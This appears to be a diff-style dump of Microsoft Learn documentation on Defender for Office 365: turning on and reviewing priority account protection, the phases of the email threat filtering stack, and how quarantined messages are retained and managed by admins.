-|Microsoft 365|[Customizable learning pathways](/office365/customlearning/)|These resources can help you put together training for users in your organization.|
-|Microsoft 365 security|[Learning module: Secure your organization with built-in, intelligent security from Microsoft 365](/training/modules/security-with-microsoft-365)|This module enables you to describe how Microsoft 365 security features work together and to articulate the benefits of these security features.|
-|Multi-factor authentication|[Download and install the Microsoft Authenticator app](https://support.microsoft.com/account-billing/351498fc-850a-45da-b7b6-27e523b8702a)|This article helps end users understand what multi-factor authentication is and why it's being used at your organization.|
-|Attack simulation training|[Get started using Attack simulation training](attack-simulation-training-get-started.md)|Attack simulation training in Microsoft Defender for Office 365 Plan 2 allows admin to configure, launch, and track simulated phishing attacks against specific groups of users.|
-
-In addition, Microsoft recommends that users take the actions described in this article: [Protect your account and devices from hackers and malware](https://support.microsoft.com/office/066d6216-a56b-4f90-9af3-b3a1e9a327d6). These actions include:
--- Using strong passwords-- Protecting devices-- Enabling security features on Windows and Mac PCs (for unmanaged devices)-
-## See also
--- [User tags in Microsoft Defender for Office 365](user-tags-about.md)-- [Configure and review priority accounts](protection-stack-microsoft-defender-for-office365.md)-- [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts)-- [Announcing Priority Account Protection in Microsoft Defender for Office 365](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/announcing-priority-account-protection-in-microsoft-defender-for/ba-p/1696385)
security Priority Accounts Turn On Priority Account Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/priority-accounts-turn-on-priority-account-protection.md
- Title: Configure and review priority account protection in Microsoft Defender for Office 365
- - NOCSH
--- Previously updated : 6/19/2023-
- - MET150
-
- - m365-security
- - tier1
-
-description: Admins can learn how to turn on priority account protection in Microsoft Defender for Office 365 Plan 2 organizations.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Configure and review priority account protection in Microsoft Defender for Office 365
--
-In Microsoft 365 organizations with Microsoft Defender for Office 365 Plan 2, _priority account protection_ is a differentiated level of protection that's applied to accounts that have the **Priority account** tag applied to them. For more information about the Priority account tag and how to apply it to users, see [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts).
-
-Priority account protection offers additional heuristics that are tailored to company executives that don't benefit regular employees. Priority account protection is better suited to the mail flow patterns of company executives based on extensive data from the Microsoft datacenters.
-
-By default, priority account protection is turned on in organizations with Defender for Office 365 Plan 2. This default behavior means an account that's tagged as a Priority account automatically receives priority account protection.
-
-This article describes how to confirm that priority account protection is turned on, how to turn it on, and identifies the reporting features that allow you to see the results of priority account protection.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/Read and manage** or **Authorization and settings/System settings/Read-only**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** or **Security Administrator** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- As previously described, priority account protection is applied to accounts that have the **Priority account** tag applied to them. For instructions, see [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts).--- The Priority account tag is a type of _user tag_. You can create custom user tags to differentiate specific groups of users in reporting and other features. For more information about user tags, see [User tags in Microsoft Defender for Office 365](user-tags-about.md).-
-## Review or turn on priority account protection in the Microsoft Defender portal
-
-> [!NOTE]
-> We don't recommend turning off priority account protection.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **Priority account protection**. Or, to go directly to the **Priority account protection** page, use <https://security.microsoft.com/securitysettings/priorityAccountProtection>.
-
-2. On the **Priority account protection** page, verify that **Priority account protection** is turned on (:::image type="icon" source="../../media/scc-toggle-on.png" border="false":::).
-
- :::image type="content" source="../../medio-priority-account-protection.png":::
-
-### Review or turn on priority account protection in Exchange Online PowerShell
-
-If you'd rather use PowerShell to verify that priority account protection is turned on, run the following command in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Get-EmailTenantSettings | Format-List Identity,EnablePriorityAccountProtection
-```
-
-The value True for the EnablePriorityAccountProtection property means priority account protection is turned on. The value False means priority account protection is turned off.
-
-To turn on priority account protection, run the following command:
-
-```powershell
-Set-EmailTenantSettings -EnablePriorityAccountProtection $true
-```
-
-For detailed syntax and parameter information, see [Get-EmailTenantSettings](/powershell/module/exchange/get-emailtenantsettings) and [Set-EmailTenantSettings](/powershell/module/exchange/set-emailtenantsettings).
-
-## Review differentiated protection from priority account protection
-
-The effects of priority account protection are visible in the following reporting features:
--- [Threat protection status report](reports-email-security.md#threat-protection-status-report)
- - [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - [View data by Email \> Spam and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--spam-and-chart-breakdown-by-detection-technology)
- - [View data by Email \> Malware and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--malware-and-chart-breakdown-by-detection-technology)
- - [Chart breakdown by Policy type](reports-email-security.md#chart-breakdown-by-policy-type)
- - [Chart breakdown by Delivery status](reports-email-security.md#chart-breakdown-by-delivery-status)
-- [Threat Explorer and real-time detections](threat-explorer-real-time-detections-about.md)-- [Email entity page](mdo-email-entity-page.md)-
-For information about where the Priority account tag and other user tags are available as filters, see [User tags in reports and features](user-tags-about.md#user-tags-in-reports-and-features).
-
-### Threat protection status report
-
-The **Threat protection status** report brings together information about malicious content and malicious email detected and blocked by Exchange Online Protection and Defender for Office 365. For more information, see [Threat protection status report](reports-email-security.md#threat-protection-status-report).
-
-In the previously mentioned views in the report, the option **Priority account protection** and the value **Yes** is available when you select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. This option allows you to filter the data in the report by priority account protection detections.
-
-### Threat Explorer
-
-For more information about Threat Explorer, see [Threat Explorer and Real-time detections](threat-explorer-real-time-detections-about.md).
-
-To view the results of priority account protection in Threat Explorer, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Explorer**. Or, to go directly to the **Explorer** page, use <https://security.microsoft.com/threatexplorer>.
-
-2. On the **Explorer** page, on the **All email**, **Malware**, or **Phish** tabs, select **Context** \> **Equal any of** \> **Priority account protection**, and then select **Refresh**.
-
- :::image type="content" source="../../media/threat-explorer-context-filter.png" alt-text="Context filter within Threat Explorer." lightbox="../../media/threat-explorer-context-filter.png":::
-
-### Email entity page
-
-The Email entity page is available from many locations in the Defender portal, including **Threat Explorer** (also known as **Explorer**). For more information, see [The Email entity page](mdo-email-entity-page.md).
-
-On the Email entity page, select the **Analysis** tab. **Priority account protection** is listed in the **Threat detection details** section.
--
-## More information
--- [User tags in Microsoft Defender for Office 365](user-tags-about.md)-- [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts)
security Protection Stack Microsoft Defender For Office365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/protection-stack-microsoft-defender-for-office365.md
- Title: Step-by-step threat protection stack in Microsoft Defender for Office 365
- - NOCSH
--- Previously updated : 8/22/2023--
-description: Follow the path of an incoming message through the threat filtering stack in Microsoft Defender for Office 365.
---- m365-security-- tier2
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Step-by-step threat protection in Microsoft Defender for Office 365
--
-The Microsoft Defender for Office 365 protection or filtering stack can be broken out into four phases, as in this article. Generally speaking, incoming mail passes through all of these phases before delivery, but the actual path email takes is subject to an organization's Defender for Office 365 configuration.
-
-> [!TIP]
-> Stay tuned till the end of this article for a *unified* graphic of all 4 phases of Defender for Office 365 protection!
-
-## Phase 1 - Edge Protection
-
-Unfortunately, Edge blocks that were once *critical* are now relatively simple for bad actors to overcome. Over time, less traffic is blocked here, but it remains an important part of the stack.
-
-Edge blocks are designed to be automatic. In the case of false positive, senders are notified and told how to address their issue. Connectors from trusted partners with limited reputation can ensure deliverability, or temporary overrides can be put in place, when onboarding new endpoints.
--
-1. **Network throttling** protects Office 365 infrastructure and customers from Denial of Service (DOS) attacks by limiting the number of messages that can be submitted by a specific set of infrastructure.
-
-2. **IP reputation and throttling** blocks messages being sent from known bad connecting IP addresses. If a specific IP sends many messages in a short period of time, they'll be throttled.
-
-3. **Domain reputation** blocks any messages being sent from a known bad domain.
-
-4. **Directory-based edge filtering** blocks attempts to harvest an organization's directory information through SMTP.
-
-5. **Backscatter detection** prevents an organization from being attacked through invalid non-delivery reports (NDRs).
-
-6. **Enhanced filtering for connectors** preserves authentication information even when traffic passes through another device before it reaches Office 365. This improves filtering stack accuracy, including heuristic clustering, anti-spoofing, and anti-phishing machine learning models, even when in complex or hybrid routing scenarios.
-
-## Phase 2 - Sender Intelligence
-
-Features in sender intelligence are critical for catching spam, bulk, impersonation, and unauthorized spoof messages, and also factor into phish detection. Most of these features are individually configurable.
--
-1. **Account compromise detection** triggers and alerts are raised when an account has anomalous behavior, consistent with compromise. In some cases, the user account is blocked and prevented from sending any further email messages until the issue is resolved by an organization's security operations team.
-
-2. **Email Authentication** involves both customer configured methods and methods set up in the Cloud, aimed at ensuring that senders are authorized, authentic mailers. These methods resist spoofing.
- - **SPF** can reject mails based on DNS TXT records that list IP addresses and servers allowed to send mail on the organization's behalf.
- - **DKIM** provides an encrypted signature that authenticates the sender.
- - **DMARC** lets admins mark SPF and DKIM as required in their domain and enforces alignment between the results of these two technologies.
- - **ARC** builds on DMARC to work with forwarding in mailing lists while recording an authentication chain.
-
-3. **Spoof intelligence** is capable of filtering those allowed to 'spoof' (that is, those sending mail on behalf of another account, or forwarding for a mailing list) from malicious senders who imitate organizational or known external domains. It separates legitimate 'on behalf of' mail from senders who spoof to deliver spam and phishing messages.
-
- **Intra-org spoof intelligence** detects and blocks spoof attempts from a domain within the organization.
-
-4. **Cross-domain spoof intelligence** detects and blocks spoof attempts from a domain outside of the organization.
-
-5. **Bulk filtering** lets admins configure a bulk confidence level (BCL) indicating whether the message was sent from a bulk sender. Administrators can use the Bulk Slider in the Antispam policy to decide what level of bulk mail to treat as spam.
-
-6. **Mailbox intelligence** learns from standard user email behaviors. It leverages a user's communication graph to detect when a sender only appears to be someone the user usually communicates with, but is actually malicious. This method detects impersonation.
-
-7. **Mailbox intelligence impersonation** enables or disables enhanced impersonation results based on each user's individual sender map. When enabled, this feature helps to identify impersonation.
-
-8. **User impersonation** allows an admin to create a list of high value targets likely to be impersonated. If a mail arrives where the sender only appears to have the same name and address as the protected high value account, the mail is marked or tagged. (For example, *tr╬▒cye@contoso.com* for *tracye@contoso.com*).
-
-9. **Domain impersonation** detects domains that are similar to the recipient's domain and that attempt to look like an internal domain. For example, this impersonation *tracye@liw╬▒re.com* for *tracye@litware.com*.
-
-## Phase 3 - Content Filtering
-
-In this phase the filtering stack begins to handle the specific contents of the mail, including its hyperlinks and attachments.
--
-1. **Transport rules** (also known as mail flow rules or Exchange transport rules) allow an admin to take a wide range of actions when an equally wide range of conditions are met for a message. All messages that flow through your organization are evaluated against the enabled mail flow rules / transport rules.
-
-2. **Microsoft Defender Antivirus** and a *third-party Antivirus engine* are used to detect all known malware in attachments.
-
-3. The anti-virus (AV) engines use true type matching to detect the file type, regardless of the filename extension (for example, `exe` files renamed to `txt` are detected as `exe` files). This capability allows **Type blocking** (also known as the common attachment filter) to correctly block file types specified by admins. For the list of supported file types, see [True type matching in the common attachments filter](anti-malware-protection-about.md#true-type-matching-in-the-common-attachments-filter).
-
-4. Whenever Microsoft Defender for Office 365 detects a malicious attachment, the file's hash, and a hash of its active content, are added to Exchange Online Protection (EOP) reputation. **Attachment reputation blocking** blocks that file across all Office 365, and on endpoints, through MSAV cloud calls.
-
-5. **Heuristic clustering** can determine that a file is suspicious based on delivery heuristics. When a suspicious attachment is found, the entire campaign pauses, and the file is sandboxed. If the file is found to be malicious, the entire campaign is blocked.
-
-6. **Machine learning models** act on the header, body content, and URLs of a message to detect phishing attempts.
-
-7. Microsoft uses a determination of reputation from URL sandboxing and URL reputation from third party feeds in **URL reputation blocking**, to block any message with a known malicious URL.
-
-8. **Content heuristics** can detect suspicious messages based on structure and word frequency within the body of the message, using machine learning models.
-
-9. **Safe Attachments** sandboxes every attachment for Defender for Office 365 customers, using dynamic analysis to detect never-before seen threats.
-
-10. **Linked content detonation** treats every URL linking to a file in an email as an attachment, asynchronously sandboxing the file at the time of delivery.
-
-11. **URL Detonation** happens when upstream anti-phishing technology finds a message or URL to be suspicious. URL detonation sandboxes the URLs in the message at the time of delivery.
-
-## Phase 4 - Post-Delivery Protection
-
-The last stage takes place after mail or file delivery, acting on mail that is in various mailboxes and files and links that appear in clients like Microsoft Teams.
--
-1. **Safe Links** is Defender for Office 365's time-of-click protection. Every URL in every message is wrapped to point to Microsoft Safe Links servers. When a URL is clicked it's checked against the latest reputation, before the user is redirected to the target site. The URL is asynchronously sandboxed to update its reputation.
-
-2. **Zero-hour auto purge (ZAP) for phishing** retroactively detects and neutralizes malicious phishing messages that have already been delivered to Exchange Online mailboxes.
-
-3. **ZAP for malware** retroactively detects and neutralizes malicious malware messages that have already been delivered to Exchange Online mailboxes.
-
-4. **ZAP for spam** retroactively detects and neutralizes malicious spam messages that have already been delivered to Exchange Online mailboxes.
-
-5. **Campaign Views** let administrators see the big picture of an attack, faster and more completely, than any team could without automation. Microsoft leverages the vast amounts of anti-phishing, anti-spam, and anti-malware data across the entire service to help identify campaigns, and then allows admins to investigate them from start to end, including targets, impacts, and flows, that are also available in a downloadable campaign write-up.
-
-6. **The Report Message add-ins** enable people to easily report false positives (good email, mistakenly marked as *bad*) or false negatives (bad email marked as *good*) to Microsoft for further analysis.
-
-7. **Safe Links for Office clients** offers the same Safe Links time-of-click protection, natively, inside supported Office apps like Word, PowerPoint, and Excel.
-
-8. **Protection for OneDrive, SharePoint, and Teams** offers the same Safe Attachments protection against malicious files, natively, inside of OneDrive, SharePoint, and Microsoft Teams.
-
-9. When a URL that points to a file is selected post delivery, **linked content detonation** displays a warning page until the sandboxing of the file is complete, and the URL is found to be safe.
-
-## The filtering stack diagram
-
-The final diagram (as with all parts of the diagram composing it) *is subject to change as the product grows and develops*. Bookmark this page and use the **feedback** option you'll find at the bottom if you need to ask after updates. For your records, this is the stack with all the phases in order:
--
-*Special thanks from MSFTTracyP and the docs writing team to Giulian Garruba for this content*.
security Quarantine About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-about.md
- Title: Quarantined email messages
- - NOCSH
----
- - MOE150
- - MED150
- - MET150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Admins can learn about quarantine in Exchange Online Protection (EOP) that holds potentially dangerous or unwanted messages.
- Previously updated : 1/17/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Quarantined email messages in EOP and Defender for Office 365
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, quarantine is available to hold potentially dangerous or unwanted messages.
-
-> [!NOTE]
-> In Microsoft 365 operated by 21Vianet, quarantine isn't currently available in the Microsoft Defender portal. Quarantine is available only in the classic Exchange admin center (classic EAC).
-
-Whether a detected message is quarantined by default depends on the following factors:
--- The protection feature that detected the message. For example, the following detections are always quarantined:
- - Malware detections by [anti-malware policies](anti-malware-policies-configure.md) and [Safe Attachments policies](safe-attachments-policies-configure.md), including [Built-in protection](preset-security-policies.md) for Safe Attachments<sup>\*</sup>.
- - High confidence phishing detections by [anti-spam policies](anti-spam-policies-configure.md).
-- Whether you're using the Standard and/or Strict [preset security policies](preset-security-policies.md). The Strict profile quarantines more types of detections than the Standard profile.-
-<sup>\*</sup> Malware filtering is skipped on SecOps mailboxes that are identified in the advanced delivery policy. For more information, see [Configure the advanced delivery policy for third-party phishing simulations and email delivery to SecOps mailboxes](advanced-delivery-policy-configure.md).
-
-The default actions for protection features in EOP and Defender for Office 365, including preset security policies, are described in the feature tables in [Recommended settings for EOP and Microsoft Defender for Office 365 security](recommended-settings-for-eop-and-office365.md).
-
-For anti-spam and anti-phishing protection, admins can also modify the default policy or create custom policies to quarantine messages instead of delivering them to the Junk Email folder. For instructions, see the following articles:
--- [Configure anti-spam policies in EOP](anti-spam-policies-configure.md)-- [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md)-- [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)-
-The protection policies for [supported features](quarantine-policies.md#step-2-assign-a-quarantine-policy-to-supported-features) have one or more _quarantine policies_ assigned to them (each action within the protection policy has an associated quarantine policy assignment).
-
-> [!TIP]
-> All actions taken by admins or users on quarantined messages are audited. For more information about audited quarantine events, see [Quarantine schema in the Office 365 Management API](/office/office-365-management-api/office-365-management-activity-api-schema#quarantine-schema).
-
-## Quarantine policies
-
-_Quarantine policies_ define what users are able to do or not do to quarantined messages, and whether users receive quarantine notifications for those messages. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-> [!TIP]
-> You can create customized [quarantine notifications for different languages](quarantine-policies.md#customize-quarantine-notifications-for-different-languages). You can also [use a custom logo in quarantine notifications](quarantine-policies.md#customize-all-quarantine-notifications).
-
-The default quarantine policies that are assigned to protection feature verdicts enforce the historical capabilities that users get for their quarantined messages (messages where they're a recipient). For more information, see the table in [Find and release quarantined messages as a user in EOP](quarantine-end-user.md). For example, only admins can work with messages that were quarantined as malware or high confidence phishing. By default, users can work with their messages that were quarantined as spam, bulk, phishing, spoof, user impersonation, domain impersonation, or mailbox intelligence.
-
-Admins can create and apply custom quarantine policies that define less restrictive or more restrictive capabilities for users, and also turn on quarantine notifications. For more information, see [Create quarantine policies](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-> [!NOTE]
-> Users can't release their own messages that were quarantined as malware by anti-malware or Safe Attachments policies, or as high confidence phishing by anti-spam policies, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware or high confidence phishing messages.
-
-Both users and admins can work with quarantined messages:
--- Admins can work with all types of quarantined messages for all users, including messages that were quarantined as malware, high confidence phishing, or as a result of mail flow rules (also known as transport rules). For more information, see [Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md).-
- > [!TIP]
- > For the permissions required to download and release any messages from quarantine, see the permissions entry [here](quarantine-admin-manage-messages-files.md#what-do-you-need-to-know-before-you-begin).
--- Users can work with their quarantined messages based on the protection feature that quarantined the message, and the setting in corresponding quarantine policy. For more information, see [Find and release quarantined messages as a user in EOP](quarantine-end-user.md).--- Admins can report false positives to Microsoft from quarantine. For more information, see [Take action on quarantined email](quarantine-admin-manage-messages-files.md#take-action-on-quarantined-email) and [Take action on quarantined files](quarantine-admin-manage-messages-files.md#take-action-on-quarantined-files).--- Users can also report false positives to Microsoft from quarantine, depending on the value of the **Reporting from quarantine** setting in [user reported settings](submissions-user-reported-messages-custom-mailbox.md).-
-### Quarantine retention
-
-How long quarantined messages or files are held in quarantine before they expire depends why the message or file was quarantined. Features and their corresponding retention periods are described in the following table:
-
-|Quarantine reason|Default retention period|Customizable?|Comments|
-|||::||
-|Messages quarantined by anti-spam policies as spam, high confidence spam, phishing, high confidence phishing, or bulk.|15 days <ul><li>In the default anti-spam policy.</li><li>In anti-spam policies that you create in PowerShell.</li></ul> <br/> 30 days <ul><li>In anti-spam policies that you create in the Microsoft Defender portal.</li><li>In the Standard and Strict [preset security policies](preset-security-policies.md#appendix)</li></ul>|Yes<sup>\*</sup>|You can configure the value from 1 to 30 days in the default anti-spam policy and in custom anti-spam policies. For more information, see the **Retain spam in quarantine for this many days** (_QuarantineRetentionPeriod_) setting in [Configure anti-spam policies](anti-spam-policies-configure.md). <br/><br/> <sup>\*</sup>You can't change the value in the Standard or Strict preset security policies.|
-|Messages quarantined by anti-phishing policies: <ul><li>**EOP**: Spoof intelligence.</li><li>**Defender for Office 365**: User impersonation protection, domain impersonation protection, and mailbox intelligence protection.</li></ul>|15 days or 30 days|Yes<sup>\*</sup>|This retention period is also controlled by the **Retain spam in quarantine for this many days** (_QuarantineRetentionPeriod_) setting in **anti-spam** policies. The retention period that's used is the value from the first matching **anti-spam** policy that the recipient is defined in.|
-|Messages quarantined by anti-malware policies (malware messages).|30 days|No|If you turn on the *common attachments filter* in anti-malware policies (in the default policy or in custom policies), file attachments in email messages to the affected recipients are treated as malware based solely on the file extension using true type matching. A predefined list of mostly executable file types is used by default, but you can customize the list. For more information, see [Common attachments filter in anti-malware policies](anti-malware-protection-about.md#common-attachments-filter-in-anti-malware-policies).|
-|Messages quarantined by mail flow rules where the action is **Deliver the message to the hosted quarantine** (_Quarantine_).|30 days|No||
-|Messages quarantined by Safe Attachments policies in Defender for Office 365 (malware messages).|30 days|No||
-|Files quarantined by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams (malware files).|30 days|No|Files quarantined in SharePoint or OneDrive are removed from quarantine after 30 days, but the blocked files remain in SharePoint or OneDrive in the blocked state.|
-|Messages in chats and channels quarantined by zero-hour auto protection (ZAP) for Microsoft Teams in Defender for Office 365|30 days|No|
-
-When a message expires from quarantine, you can't recover it.
-
-For more information about quarantine, see [Quarantine FAQ](quarantine-faq.yml).
security Quarantine Admin Manage Messages Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/quarantine-admin-manage-messages-files.md
- Title: Manage quarantined messages and files as an admin----
- - MOE150
- - MED150
- - MET150
-
- - m365-security
- - tier1
-
- - seo-marvel-apr2020
-description: Admins can learn how to view and manage quarantined messages for all users in Exchange Online Protection (EOP). Admins in organizations with Microsoft Defender for Office 365 can also manage quarantined files in SharePoint Online, OneDrive for Business, and Microsoft Teams.
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# Manage quarantined messages and files as an admin
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or Microsoft Teams, or in standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes or Teams, quarantine holds potentially dangerous or unwanted messages that were detected by EOP and Defender for Office 365.
-
-Admins can view, release, and delete all types of quarantined messages and files for all users.
-
-Admins in organizations with Microsoft Defender for Office 365 can also manage files that were quarantined by [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md) and Microsoft Teams messages that were [quarantined by zero-hour auto purge (ZAP)](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-in-microsoft-teams).
-
-Users can manage most quarantined email messages based on the _quarantine policy_ for [supported email protection features](quarantine-policies.md#step-2-assign-a-quarantine-policy-to-supported-features). For more information about quarantine policies, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-Admins and also users (depending on the [user reported settings](submissions-user-reported-messages-custom-mailbox.md) for the organization) can report false positives to Microsoft from quarantine.
-
-You view and manage quarantined messages in the Microsoft Defender portal or in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-Watch this short video to learn how to manage quarantined messages as an admin.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWGGPF]
-
-## What do you need to know before you begin?
--- To open the Microsoft Defender portal, go to <https://security.microsoft.com>. To go directly to the **Quarantine** page, use <https://security.microsoft.com/quarantine>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](../defender/manage-rbac.md) (Affects the Defender portal only, not PowerShell):
- - _Take action on quarantined messages for all users_: **Security operations / Security data / Email & collaboration quarantine (manage)**.
- - _Read-only access to quarantined messages for all users_: **Security operations / Security data / Security data basics (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Take action on quarantined messages for all users_: Membership in the **Quarantine Administrator**, **Security Administrator**, or **Organization Management** role groups.
- - _Submit messages from quarantine to Microsoft_: Membership in the **Quarantine Administrator** or **Security Administrator** role groups.
- - _Use **Block sender** to [add senders to your own Blocked Senders list](#block-email-senders-from-quarantine)_: By default, all users have the required permissions. Whether the **Block sender** action is available to non-admins is typically controlled by the [Block sender permission](quarantine-policies.md#block-sender-permission) in quarantine policies. Assigning any permission that gives admin access to quarantine (for example, **Security Reader** or **Global Reader**) gives access to **Block sender** in quarantine.
- - _Read-only access to quarantined messages for all users_: Membership in the **Security Reader** or **Global Reader** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership these roles gives users the required permissions _and_ permissions for other features in Microsoft 365:
- - _Take action on quarantined messages for all users_: Membership in the **Security Administrator or **Global Administrator** roles.
- - _Submit messages from quarantine to Microsoft_: Membership in the **Security Administrator** role.
- - _Use **Block sender** to [add senders to your own Blocked Senders list](#block-email-senders-from-quarantine)_: By default, all users have the required permissions. Whether the **Block sender** action is available to non-admins is typically controlled by the [Block sender permission](quarantine-policies.md#block-sender-permission) in quarantine policies. Assigning any permission that gives admin access to quarantine (for example, **Security Reader** or **Global Reader**) gives access to **Block sender** in quarantine.
- - _Read-only access to quarantined messages for all users_: Membership in the **Global Reader** or **Security Reader** roles.
-
- > [!TIP]
- > The ability to manage quarantined messages using [Exchange Online permissions](/exchange/permissions-exo/permissions-exo) ended in February 2023 per MC447339.
- >
- > Guest admins from other organizations can't manage quarantined messages. The admin needs to be in the same organization as the recipients.
--- Quarantined messages and files are retained for a default period of time based on why they were quarantined. After the retention period expires, the messages are automatically deleted and aren't recoverable. For more information, see [Quarantine retention](quarantine-about.md#quarantine-retention).--- All actions taken by admins or users on quarantined messages are audited. For more information about audited quarantine events, see [Quarantine schema in the Office 365 Management API](/office/office-365-management-api/office-365-management-activity-api-schema#quarantine-schema).-
-## Use the Microsoft Defender portal to manage quarantined email messages
-
-### View quarantined email
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Review** \> **Quarantine** \> **Email** tab. Or, to go directly to the **Email** tab on the **Quarantine** page, use <https://security.microsoft.com/quarantine?viewid=Email>.
-
-On the **Email** tab, you can decrease the vertical spacing in the list by clicking :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal** and then selecting :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-You can sort the entries by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default values are marked with an asterisk (<sup>\*</sup>):
--- **Time received**<sup>\*</sup>-- **Subject**<sup>\*</sup>-- **Sender**<sup>\*</sup>-- **Quarantine reason**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Release status**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Policy type**<sup>\*</sup> (see the possible values in the :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** description.)-- **Expires**<sup>\*</sup>-- **Recipient**: The recipient email address always resolves to the primary email address, even if the message was sent to a [proxy address](/exchange/recipients-in-exchange-online/manage-user-mailboxes/add-or-remove-email-addresses).-- **Message ID**-- **Policy name**-- **Message size**-- **Mail direction**-- **Recipient tag**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filters** flyout that opens:
--- **Message ID**: The globally unique identifier of the message.-
- For example, you used [message trace](message-trace-defender-portal.md) to look for a message, and you determine that the message was quarantined instead of delivered. Be sure to include the full message ID value, which might include angle brackets (\<\>). For example: `<79239079-d95a-483a-aacf-e954f592a0f6@XYZPR00BM0200.contoso.com>`.
--- **Sender address**-- **Recipient address**-- **Subject**-- **Time received**:
- - **Last 24 hours**
